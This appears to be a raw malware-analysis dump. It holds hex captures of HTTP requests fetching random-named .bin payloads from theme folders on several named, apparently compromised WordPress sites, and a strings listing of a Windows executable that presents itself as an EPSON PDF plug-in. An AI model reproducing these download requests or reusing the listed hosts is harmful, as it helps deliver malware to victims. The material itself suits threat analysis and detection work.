0x000000c0 (00192)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f77 68663379 71346e38 36716533   ht/whf3yq4n86qe3
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a206672 65656b69   7)..Host: freeki
0x000000a0 (00160)   64737669 64656f73 2e6e6574 0d0a4361   dsvideos.net..Ca
0x000000b0 (00176)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000c0 (00192)   63616368 650d0a0d 0a0d0a0d 0a         cache........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f33 35306738 74342e62 696e2048   ht/350g8t4.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 626c6f67 2e6d6172   ..Host: blog.mar
0x000000a0 (00160)   69616e69 73656c2e 636f6d0d 0a436163   ianisel.com..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a 0a0d0a0d 0a         ache.........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f32 39757473 35687a74 72352048   ht/29uts5hztr5 H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 64657369 676e6279   ..Host: designby
0x000000a0 (00160)   7468656d 652e636f 6d0d0a43 61636865   theme.com..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a0d0a 0a0d0a0d 0a         he...........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6a 61727261 682f3379   themes/jarrah/3y
0x00000020 (00032)   6a6b7664 75742e62 696e2048 5454502f   jkvdut.bin HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000050 (00080)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000060 (00096)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000070 (00112)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000080 (00128)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x00000090 (00144)   73743a20 7777772e 6772656b 69736b61   st: www.grekiska
0x000000a0 (00160)   666f7265 6e696e67 656e2e63 6f6d0d0a   foreningen.com..
0x000000b0 (00176)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000c0 (00192)   6f2d6361 6368650d 0a0d0a0d 0a         o-cache......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6b 74773478 32692e62 696e2048   ht/ktw4x2i.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 62657468 70657465   ..Host: bethpete
0x000000a0 (00160)   72732e6e 65740d0a 43616368 652d436f   rs.net..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a0d0a61 6368650d 0a0d0a0d 0a         ...ache......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f68 6c6b6139 6a383166 20485454   ht/hlka9j81f HTT
0x00000030 (00048)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000040 (00064)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000050 (00080)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000060 (00096)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000070 (00112)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000080 (00128)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000090 (00144)   486f7374 3a206461 6e69656c 66657272   Host: danielferr
0x000000a0 (00160)   69732e63 6f6d2e61 750d0a43 61636865   is.com.au..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a650d 0a0d0a0d 0a         he....e......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6f 63336461 20485454 502f312e   ht/oc3da HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207374 7061756c 6d617962 65652e6f   : stpaulmaybee.o
0x000000a0 (00160)   72670d0a 43616368 652d436f 6e74726f   rg..Cache-Contro
0x000000b0 (00176)   6c3a206e 6f2d6361 6368650d 0a0d0a63   l: no-cache....c
0x000000c0 (00192)   68650d0a 0d0a650d 0a0d0a0d 0a         he....e......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f63 6c617373 69632f67   themes/classic/g
0x00000020 (00032)   34337a6e 37366e30 31636820 48545450   43zn76n01ch HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000050 (00080)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000060 (00096)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000070 (00112)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000080 (00128)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000090 (00144)   6f73743a 20626261 6c6c2d6b 65796d61   ost: bball-keyma
0x000000a0 (00160)   6e2e6e65 740d0a43 61636865 2d436f6e   n.net..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a0d0a 0d0a650d 0a0d0a0d 0a         ......e......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f62 77363974 20485454 502f312e   ht/bw69t HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207669 72616368 65792e63 6f6d0d0a   : virachey.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a63 68650d0a   o-cache....che..
0x000000c0 (00192)   0d0a0d0a 0d0a650d 0a0d0a0d 0a         ......e......

0x00000000 (00000)   47455420 2f2f7770 2d636f6e 74656e74   GET //wp-content
0x00000010 (00016)   2f746865 6d65732f 6c696768 74776569   /themes/lightwei
0x00000020 (00032)   6768742f 396d6c6d 6b6d7379 78797572   ght/9mlmkmsyxyur
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a20636c 65726b74   7)..Host: clerkt
0x000000a0 (00160)   6f676f76 65726e6f 72732e63 6f2e756b   ogovernors.co.uk
0x000000b0 (00176)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000c0 (00192)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f77 68663379 71346e38 36716533   ht/whf3yq4n86qe3
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a206672 65656b69   7)..Host: freeki
0x000000a0 (00160)   64737669 64656f73 2e6e6574 0d0a4361   dsvideos.net..Ca
0x000000b0 (00176)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000c0 (00192)   63616368 650d0a0d 0a0d0a0d 0a         cache........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f33 35306738 74342e62 696e2048   ht/350g8t4.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 626c6f67 2e6d6172   ..Host: blog.mar
0x000000a0 (00160)   69616e69 73656c2e 636f6d0d 0a436163   ianisel.com..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a 0a0d0a0d 0a         ache.........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f32 39757473 35687a74 72352048   ht/29uts5hztr5 H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 64657369 676e6279   ..Host: designby
0x000000a0 (00160)   7468656d 652e636f 6d0d0a43 61636865   theme.com..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a0d0a 0a0d0a0d 0a         he...........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6a 61727261 682f3379   themes/jarrah/3y
0x00000020 (00032)   6a6b7664 75742e62 696e2048 5454502f   jkvdut.bin HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000050 (00080)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000060 (00096)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000070 (00112)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000080 (00128)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x00000090 (00144)   73743a20 7777772e 6772656b 69736b61   st: www.grekiska
0x000000a0 (00160)   666f7265 6e696e67 656e2e63 6f6d0d0a   foreningen.com..
0x000000b0 (00176)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000c0 (00192)   6f2d6361 6368650d 0a0d0a0d 0a         o-cache......


Strings
141804b0
3.9.0.0
{8856F961-340A-11D0-A96B-00C04FD705A2}
Bold
Check out it in live application: Tray Helper :)
CompanyName
Copyright (C) SEIKO EPSON CORP. 2002 
%d.%d.%d
%d,%d,%d,%d,%s,%s,%s
Eppdfres.dll
EPSON PDF Plug-in
FileDescription
FileVersion
Get HTML
HtmlEditor
http://www.codeguru.com
Hyperlink
Insert image
Italic
kernel32.dll
LegalCopyright
MS Sans Serif
OriginalFilename
ProductName
ProductVersion
Redo
SEIKO EPSON CORP.
Show source
%%%%%s^^%%%%%s^^%%%%%d^^%%%%%d^^%%%%%d^^%%%%%d^^%%%%%d^^%%%%%d^^%%%%%d^^%%%%%d^^**
StringFileInfo
Translation
Underline
Undo
VarFileInfo
VS_VERSION_INFO
)@*[$|
000DqZO
000Dr[O
0#4tJ`tAm
08/05/14
1Dto:?
+1+e+?
1f:+$C=
1I2pc|N
1QB9ZI:
21QiHdNy
222Br[O
23e7>Y
2&$AO{byz
\2,t-|
2+t+A+
3:~00{
34[T*\
36Pb*)
3qR#E"4
3sl|$V
3xb=oC
4"'33Me
444DqZP
444Dr^V
444Dtqp
44!+i_j
]{{47/
4BY"h( 
}4'K<6
4orWa2
4QOyAJw
?(5NPr#]
5nS)4m
5PRich
..6#{9
6c[&LQ
6+fbDAg
///6o\Q
6/o<TviH=
6V'fvW
+6YDPUIZ,
7C`~B8
7_Df.l
7ExI3q
7nl>wz
7>XsA`
`]80Z/p(
'	8=5q
888Dvvv
888Dwww
888Dzzz
8c_U;'
8-*	H,
%8JCH@
+|_8$M
'8-'Wt}N
9!2~#-
~9*4[1?
$9a]|W
9c1E g<
9fS5Uq
9]iLY1V
9lz2O(r!
9(SU<E
9X};R]f
9Ya1sQ
<ab)04
_adjust_fdiv
Adobe Fireworks CS4
ADVAPI32.dll
%AHe^8
$aNfdo
#|aNf!j
*A<p?h+
aplLQ%pe+
>{aPqD
A.r.i.a.l...L.i.n.e.i.n.e.t.i...A.r.i.a.l.b.....B.o.l.l.T.e.c.h.r.o.u.n.d...C.o.p.y.p.a.s.t.e...f.o.r...m.y.m.y.a.p.p...e.x.e
a!,T/>+a+
		.Av~
/Aw5^r
@+]+b+b
BF N1N
b-gUG)
&bHOSb
b#i41j
bLC@1z
-BL'!,?rA
bM1\!E
,|b}mc
	(bW~R
B.Z os
c@? >,
+c2V|6&
Chd${!
CJ,WaL3N
c=k.9\
c&lU{3
C{@m;4J
C?N?j:
_controlfp
CORxkt
CreateFileW
<CUUe5
&C(vc-
CWebBrowser2
__CxxFrameHandler
<<<D~~~
<<<D|||
<<<D{{{
D]	}$&
*.D	0t
D4OM{n
d]6JxJ%
@.data
DBxDnW
=}Df~_\h7M
D}/iJb
' }"D#J
__dllonexit
)|<^dm:
dN\i=	B
Dnzp,^F
`dr|2y6_
e3qf`a
E4zJvP
e5QVbb
+e+c' 
edg\i8
-<@<EJ
EnableWindow
EX9;$(
_except_handler3
*/{ey@
e*y,3G
,&e` Z
--ez f
^'F( ]
f6rmJ 
F,a7mN+
fclose
FFh](T"
F+g+"+
'fh?D7
fKSmFu
fN8.X#S
fPPxt'#[
FpWmimBR5/
f[V}5IP^
fxFdkIU
fYECJ_P
,G73z-
g8P|K)
G(cOH>
g,Dp~j
GetModuleFileNameW
GetModuleHandleW
GetProcAddress
GetStartupInfoW
GkP}"=]
#gNI1&
'`	g~x
g`^)x/;
]!Gya&C
~gzcUkb
H9eYL3$
$hAyWI
`{Hb#Q
_H`c [T
)Hefo4
HH`7\Z
HHHHHHH
HN /C*
hn(l	>oV
>HpK=H
HSKui0
h-uc5.
'H-wSI
I05)/N
_i}@*6
ibnN-"7=
)iCOdjm4
iCO?gr
iI-K&.
%ijZ<c
_initterm
|@iP'G
I$`!SQI
IsTextUnicode
@)%J }
J&31S*h
JB,zsEK
%jd<>c
JeA/t#$
~JE!z3
`<jGum
"##'jj
JJ*qJ{
!j`K=M
	J#:)L#k
,j/N5R
Jn5w6tVuv%
 jNF%A
]jOa%L[Q
J!P !~
J`PTEd
JTfB"n
jTfq7^
jUd5cJ
,]|*juL4c
J@wuU[06
K$bhMQd
kEHL|;D
kernel32.dll
KERNEL32.dll
@-KEX@
kjyW}*
~KoS9FZP<
<kw]T9
k,:#X<|
kZsVA\<
L8epmt
L9Ae['j
la_.;g
Lc:5/9
Lf+P-@
l.g07)
LHwEa)
L\IL7Gt
lisPc#
lkF3G2
LLLLLL
lM*pGf\(!
`\"\LN
LoadIconW
LoadLibraryA
L_}O`g}S.
`}:"LVH
,%/l+,+Y]4
}|m&${
[$M?3w
Ma0@&Y
memcpy
memset
MessageBoxW
MFC42u.DLL
MIs_ j
MjRUD;
	mmfRV
Mm&I?7
MmT3zR
:mog=v
MSVCRT
MultiByteToWideChar
*mX2{l
n+c+H+
N`^D}|
n:l4'%I
nLK{{!H
n>^Nd;
N+x+i+
o3im@ge>
O.6<0<G
o~|7)z
	.oGjD
?oj+6Jh<
OLEAUT32.dll
_onexit
OO\4sp
/oOeaG
o'PYv%
o)ta=1
%~O@$u
oVJ{TQ
ov*uN*t6gF
(/oYlp
O#yu-8
P1Q1yj-
p{2(0$
P4rRNY
%p5n'K4o8I
P (	7s
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
__p__commode
P==ded_
p~Dj(9
pdWrG[
Pe:'zp
p{FH^<
pf kY?
__p__fmode
p/HC0i%t
$pIL9?vvq
/\p{kF
P&O:)%
P]oujg.
.p.p...e...............
Ps]Kx]
(PSttst
p{ w/+
-pX<#?
P<\x"4:
Px5FaC#
PxVI+:
PyD()	WWq,
///PYRM
@q;3}[
Q7jEq\
Q/~b _
q	;h,1
)q+,+^\%I
q+P- =
+Q+Q+]
$qsn\2
'qtSI{
#QU `A
qVt+MP
QWg6.?
qz&|tKka
R3jJ)Sqhn
%R&5N+fdS
r8c2@V
rB^N:#
`.rdata
rewind
rG1$fy!d
r[G*s[
-R_Gwc
rGyrYyh
r\&H5c2
rl6k]|
r nUV'0
|Rpn5D
rQCqey
rQ$#!G
rtnm*i6)
?{ry6L(
ry&eQf,
S3aZ>h
S3@|)?nk}
S)@7^}
 S+_7L
__set_app_type
__setusermatherr
 ShN]I!
+~si5g
s[i;:HP8
_snwprintf
s)pK;	*
Sq[ekb;
S<qh(*
SSS+iiiMuuu]ttt`ttt`ttt`ttt`ttt`ttt`ttt`ttt`rrrb
strncpy
StxtaVM
SUn&dAV
*+^+T+
T2|*#S
}t5ps]
+#+T+b
Tb}uE-
{T+coC
t_)dmSj&f#
tEXtCreation Time
tEXtSoftware
tgRY<?
!This program cannot be run in DOS mode.
Tj7]^:%
>tK6|I8
TN_`:]
tNy( (
Tp+)Fx
TsI.XrQ
TW8^/@
:tWXr}x
[]&tyJg
U]6=DL
UBnQ2?W
uHq+qi
ums7^	
...,[UO
 -UO~J
u$OkL%
U	-R}B
USER32.dll
uX4K1%n
: =V^(
	v\4mt
.>V5HW
VAyr;Ujdb
v@E+jw
_V+F t
VmN	oB!
vn{-a,1
Vpaj/.
V_Ph~2h4
V*PIFv
vpY!BG
v(	roH
\v sHJ
VSxTPWr1/
vUIZo=
VUU%w0O
V\V*C+
 .V$VS<
w2meNQ
]W-B2Q
wbT3QN
_wcmdln
wcscmp
W]$D+y
_wfopen
^.,w`G]
__wgetmainargs
WH/`'N
WMI^:Qk%
WM#lx`
'WN15xZ
!wOM"0v
+w+!+rY
WsZZaL
Wuds8;
;^w'wGU
Xa7k":
_XcptFilter
,	-XDv
XIiE5?	
x==Ky)
`XmQ7Zq	M7j
x}?r5(a
xSV:9J
xu=F%7=
X~y+9E
/XzV@"
)Y8U0R
yATbw#
}&y\gU
+y+$+J
Y m)xd
Ymy!pE
Yu4MOb
y&$*vz
z2:rX	
Z47&Jx
%"zcCg
Zd*n9<
Zf[^9,MC
Z~F+G,
 z\GoT
zg/#_TK
\~ZhAr
Z~isTc
Z=$\/l
Zl6unB
Z&wO?N8